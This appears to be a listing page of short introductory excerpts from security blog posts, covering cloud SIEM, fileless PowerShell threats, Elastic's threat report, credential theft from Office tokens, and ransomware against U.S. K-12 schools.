As organizations are rapidly moving to the cloud to leverage the cloud advantage, services are also moving to the cloud, including cybersecurity solutions such as SIEM. In fact, SIEM as a Service is rapidly gaining momentum as an alternative to traditional, on-premises SIEM solutions. In its 10 Questions to Answer Before Adopting a SaaS SIEM report, Gartner had predicted that by 2023, 80% of SIEM solutions will have capabilities that are delivered via the cloud.

Investigating the origin of activity in cloud-native infrastructure—and understanding which activity is a potential threat—can be a challenging, time-consuming task for organizations. Cloud environments are complex by nature, comprising thousands of ephemeral, interconnected resources that generate large volumes of alerts, logs, metrics, and other data at any given time.

Fileless threats are on the rise. These threats occur when cybercriminals use pre-existing software in victims’ systems to carry out attacks, instead of using a malicious attachment or file. More often than not, a criminal’s favorite tool for a fileless attack is PowerShell.

LogSentinel’s operational security platform ( SIEM, XDR & SOAR) continuously optimizes the models of specialized threat systems and has created eight layers of anti-threat weapons. Based on the characteristics of user behavior and traffic analysis, the series of local anti-threat modules form an iron wall to prevent telecommunication and network threats and protect the safety of users’ communications and property.

The first Elastic Global Threat Report was published earlier this week. In it, you will learn about trends observed by our threat researchers, our predictions for what’s coming next, and some of our recommendations to operate securely in the face of today’s and tomorrow’s threats. If you haven’t read it yet, go check it out. As a technical leader in Elastic Security, I'd like to reveal a small amount about what goes into reports like this one and why it’s significant.

I remember where I was sitting when I read Mandiant’s first M-Trends report on the advanced persistent threat in 2010. I was a technical director at the National Security Agency in the office of Tailored Access Operations (TAO). At that time, my job was to build computer network exploitation (CNE) tools to collect foreign intelligence.

When we hear the term “Credential Access” our detection engineer thoughts typically turn to the Windows LSASS Process and tools like Mimikatz. Recently, however, researchers have drawn our attention to Microsoft Office processes. These processes also store credential material, in the form of access tokens.

Staying up-to-date on the current state of security and understanding the implications of today’s growing threat landscape is critical to my role as CISO at Elastic. Part of this includes closely following the latest security threat reports, highlighting trends, and offering valuable insights into methods bad actors use to compromise environments.

When delivering customer experiences from the cloud, defending the app includes the data it houses and the business it represents. The DevSecOps mindset, “You build it, you run it, you secure it” helps, but only when all teams are empowered with the info they need to see a threat, regardless of where it is.

K-12 school districts in the U.S. are struggling with cybersecurity. According to an October 2022 GAO report, ransomware attacks have cost schools up to three weeks of missed learning. The GAO also noted that recovery can take as long as nine months. In January 2021, 3,000 K-12 public schools in the U.S. were victim to a large-scale worldwide cyberattack.